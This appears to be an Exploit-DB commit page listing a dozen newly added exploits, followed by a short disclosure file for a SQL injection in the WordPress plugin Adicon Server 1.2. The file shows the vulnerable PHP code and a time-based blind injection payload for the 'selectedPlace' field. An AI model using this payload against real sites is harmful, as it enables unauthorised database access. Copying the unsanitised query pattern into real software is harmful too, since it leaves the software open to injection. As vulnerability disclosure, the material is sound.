e8dcb9f022
12 changes to exploits/shellcodes EZ CD Audio Converter 8.0.7 - Denial of Service (PoC) NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC) NBMonitor Network Bandwidth Monitor 1.6.5.0 - 'Name' Denial of Service (PoC) WebKit JSC - 'AbstractValue::set' Use-After-Free WebKit JSC - 'JSArray::shiftCountWithArrayStorage' Out-of-Bounds Read/Write Ayukov NFTP FTP Client 2.0 - Buffer Overflow Hashicorp Consul - Remote Command Execution via Rexec (Metasploit) Hashicorp Consul - Remote Command Execution via Services API (Metasploit) WordPress Plugin Adicon Server 1.2 - 'selectedPlace' SQL Injection Frog CMS 0.9.5 - Cross-Site Scripting ZeusCart 4.0 - Cross-Site Request Forgery (Deactivate Customer Accounts) WSTMart 2.0.8 - Cross-Site Scripting ZeusCart 4.0 - Cross-Site Request Forgery (Deactivate Customer Accounts) WSTMart 2.0.8 - Cross-Site Scripting FrontAccounting 2.4.5 - 'SubmitUser' SQL Injection Craft CMS 3.0.25 - Cross-Site Scripting bludit Pages Editor 3.0.0 - Arbitrary File Upload WordPress Plugin Baggage Freight Shipping Australia 0.1.0 - Arbitrary File Upload bludit Pages Editor 3.0.0 - Arbitrary File Upload WordPress Plugin Baggage Freight Shipping Australia 0.1.0 - Arbitrary File Upload Vtiger CRM 7.1.0 - Remote Code Execution
18 lines
No EOL
576 B
Text
18 lines
No EOL
576 B
Text
# Exploit Title: WordPress Plugin Adicon Server 1.2 - 'selectedPlace' SQL Injection
|
|
# Date: 2018-12-28
|
|
# Software Link: https://wordpress.org/plugins/adicons/
|
|
# Exploit Author: Kaimi
|
|
# Website: https://kaimi.io
|
|
# Version: 1.2
|
|
# Category: webapps
|
|
|
|
# SQL Injection
|
|
# File: addIcon.php
|
|
# Vulnerable code:
|
|
# $placement=$_POST['selectedPlace'];
|
|
|
|
# $x=explode("_",$placement);
|
|
# $ck=$wpdb->get_row("select id from ".$table_prefix."adicons where adRow=".$x[0]." and adCol=".$x[1]);
|
|
|
|
# Example payload:
|
|
selectedPlace=1 AND (SELECT * FROM (SELECT(SLEEP(1)))abcD); -- - |